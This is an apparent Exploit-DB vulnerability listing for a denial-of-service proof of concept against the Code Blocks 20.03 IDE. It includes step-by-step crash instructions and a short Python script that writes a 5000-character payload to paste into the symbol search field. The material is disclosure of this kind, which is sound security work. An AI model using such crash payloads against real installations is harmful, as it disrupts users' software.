Code Blocks 20.03 - Denial Of Service (PoC)

vendor:

Code Blocks

by:

Paras Bhatia

5.5

CVSS

MEDIUM

Denial of Service (DoS)

400

CWE

Product Name: Code Blocks

Affected Version From: 20.03

Affected Version To: 20.03

Patch Exists: NO

Related CWE:

CPE: a:code_blocks:code_blocks:20.03

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Ultimate Service Pack 1 (32 bit - English)

2020

Code Blocks 20.03 – Denial Of Service (PoC)

The Code Blocks software version 20.03 is vulnerable to a Denial of Service (DoS) attack. By providing a large payload, the software crashes when attempting to search for symbols in the 'Management' section. This can be exploited by an attacker to disrupt the functionality of the software.

Mitigation:

There is currently no patch available for this vulnerability. As a mitigation measure, users are advised to avoid importing large payloads or limit the size of the payload when using the software.

Source

Exploit-DB raw data:

# Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC) 
# Vendor Homepage: http://www.codeblocks.org/ 
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-23
# Vulnerable Software: Code Blocks
# Version: 20.03
# Vulnerability Type: Denial of Service (DoS)
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  

#Steps to Produce the Crash:

#   1.- Run python code: CodeBlocksCrash.py
#   2.- Copy content to clipboard
#   3.- Open "codeblocks.exe"
#   4.- In the "Management" section on left hand side, Click on "FSymbols" tab.
#   5.- Select "Active project's symbols" from drop down "View:" menu.
#   6.- Paste ClipBoard into the "Search:" field.
#   7.- Press Enter from keyboard.
#   8.- Crashed.


##################################################################################################################################################


#Python "CodeBlocksCrash.py" Code:

f= open("CodeBlocksCrash.txt", "w")

payload="\x41" * 5000

f.write(payload)

f.close()